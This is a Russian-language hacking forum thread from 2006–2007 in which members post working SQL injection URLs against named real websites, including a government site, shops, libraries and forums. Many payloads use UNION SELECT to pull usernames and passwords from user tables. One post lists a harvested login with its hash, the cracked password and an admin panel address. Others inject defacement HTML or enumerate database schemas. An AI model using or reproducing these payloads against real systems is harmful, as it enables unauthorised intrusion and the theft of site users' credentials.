SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://www.rosprom.gov.ru/snews.php?id=-99+union+select+1,2,3,0x3c6d6172717565653e707265766564203a443c2f6d6172717565653e,5,6/*
     
  2. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.atlant.by/?r=-1+union+select+55555555,2/*

    http://news.samaratoday.ru/wheel.php?r=-1+union+select+1,concat(userid,char(58),email,char(58),username),3,4+from+users+limit+0,2/*

    http://www.tiiel.ru/index.php?r=newstext&nid=1'

    http://www.avtoram.com/index.php?action=news&id=-1+union+select+1,concat(auth_user,char(58),auth_password),3,4+from+auth_users+limit+1,1/*
    Союз писателей ))
     
    1 person likes this.
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.crazypeople.ru/index.php?cnt=100&news_id=-99+union+select+1,2,3,4,5,6,7,concat(login,0x3a,password),9,10+from+user+limit+0,1/*
    Code:
    http://www.crazypeople.ru/index.php?cnt=100&news_id=-99+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,user_password,0x3a,user_icq),10+from+phpbb_users/*
    Isa:3e2f1979341d3ddc91a8065bb0eb3332
    Isa:fhtdbr
    http://www.crazypeople.ru/forum/admin/

    etc...
     
    1 person likes this.
  4. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://lib.chistopol.ru/?cat_id=6+union+select+1,2,3,0x416e746963686174203b29/*

    _http://www.nskfitness.ru/articles.php?cat_id=12+union+select+1,2,0xd3ffe7e2e8eceef1f2e8a0f1e0e9f2eee2,4,5,6,7,8,9,10,11/*

    смотри список часто читаемых статей :)
     
    #264 злюка, 17 Jan 2007
    Last edited: 17 Jan 2007
  5. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://world-basket.biz/galery/photo.php?cat=1
    я столбцы подобрать так и не смог, кому не впадлу, подберите
     
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://abhazia.com/news/detail.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    Абхазия :mad:
     
    1 person likes this.
  7. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    Официальный сайт Школы научной астрологии

    Code:
    http://www.astro-school.ru/secret.html?id=-1+union+select+1,0x3C68313E505245564544203A443C2F68313E,3,4/*
     
    3 people like this.
  8. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.mediaprovinces.kz/index.php?r=-1+union+select+concat(username,char(58),user_id,char(58),user_password),3+from+phpbb_users+limit+1,1/*


    Спасиба сам справился! )))
     
    #268 *D1VER, 17 Jan 2007
    Last edited: 17 Jan 2007
    1 person likes this.
  9. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.vendeta.ru/comm.php?id=-1+union+select+1,2,3,login_user,pass_user,6+from+users/*

    Всем Любителям Бойцовского клуба! )))
    Удачного веселья!
     
    1 person likes this.
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://motoboy.hu/munkaadok/index.php?kat=99%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11/*
     
    4 people like this.
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Code:
    http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,convert(version()+using+latin1)/*
    ___
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://expoelectroseti.ru/index.php?id=-1+union+select+1,2,3,4,5,6,table_name,8+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*&lng=ru
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.paromy.ru/main.php?l1=3&l3=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    при попытке извлеч данные из таблицы, перекидывает на страницу хоста =(
     
  14. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    HTML:
    http://lineage.te.ua/kb.php?npc_id=25259999%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38/*
     
    1 person likes this.
  15. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://ultrabyte.ru/viewvac.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
     
  16. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://02.ru/news/index.php?id_tn=5&id_n=-99+union+select+1,2,3,4,5,6,7/*
    Code:
    http://job.02.ru/sql.php?type=fvac&id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    Вообщем весь "портал" бажный =\
     
    2 people like this.
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Хостинг UkrNic
    http://www.ukrnic.com/hosting_info.php?id=-1+union+select+1,VERSION(),USER()/*
    Инет магазин www.PRESSA.net
    Обычные юзвери
    С привелегиями
     
    #277 Spyder, 18 Jan 2007
    Last edited by a moderator: 18 Jan 2007
  18. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    сел седня изучать скл-инж, вроде начало получаться, но в итоге логинов/паролей не получил, а так нарыл следующее, может и фигня, хз :

    Code:
    http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('ForumMessages','DelficsClassPhotoPoints','ForumForums','DelficsClassPhoto','Banners','Articles','ForumSections','NewsVendors','ATI_Sections','ManagerShopPollOtherSources','NewsDelfics','ATI_MBChipset','ProductsTypes','dtproperties','ForumSubscribers','ManagerShopLogins','LinksFamajor','ManagerShopPollSources','ManagerShopPollDay','ManagerShopPollSums','GbSections','NewsBigmir','NewsCompany','MHShops','NewsGB','NewsHifiSections','NewsShop','NewsHifi','ProductsAction','ProductsArticles','ManagerShopPollCustomer','ProductsComputersAction','ProductsDrivers','ProductsCertificatesAccordance','ProductsParameters','ProductsMain','ProductsParametersAccordanceTypes','ProductsParametersVariantValues','ProductsSections','ProductsParametersValues','ProductsTerms','ProductsValues','RacingCardsView','SearchQueries','ShopCustomers','ServiceCenters','ShopCustomersCities','RacingBingo','Racings','ShopCustomersRegions','ShopDeliveryNightExpress','ShopDeliveryVariants','ShopOrders','ShopOrdersComments','ShopOrdersItems','StormTypes','ProductsCertificates','ShopOrderStatuses','ShopProductsOnMain','ShopSessions','ShopPaymentVariants','sysconstraints','Vendors','StormProducts','VotesQuestions','VotesAnswers','syssegments','ShopDeliveryPlaces','RacingCards','VendorsStatuses','ProductsTypesDiscont','MHSaturday','ProductsLinks'))--
    и детальные на некоторые
    Code:
    http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='GbSections'+AND+COLUMN_NAME+NOT+IN+('sectionID','sectionurl','sortorder','parentid','sectioncontent','sectionname'))--
    Code:
    http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='dtproperties'+AND+COLUMN_NAME+NOT+IN+('id','objectid','property','value','uvalue','lvalue','version'))--

    Code:
    http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='Articles'+AND+COLUMN_NAME+NOT+IN+('Article_id','Article_Name','File_name','Type_id','Views','ArticleType_id','Vendor_Id','add_date','ProductsSection_Id'))--
    если кто-то что-то интересное вытянет, напишите в приват, а то мне учиться надо :)
     
    3 people like this.
  19. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    _http://www.searchmonster.org/index.php?lw=16903+union+select+1,2,3,4,5+from+wsr/*
    
    на столбцы не хватило нервов))
     
  20. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.gelezo.net/files.php?id=20031030191145'
     
Thread Status:
Not open for further replies.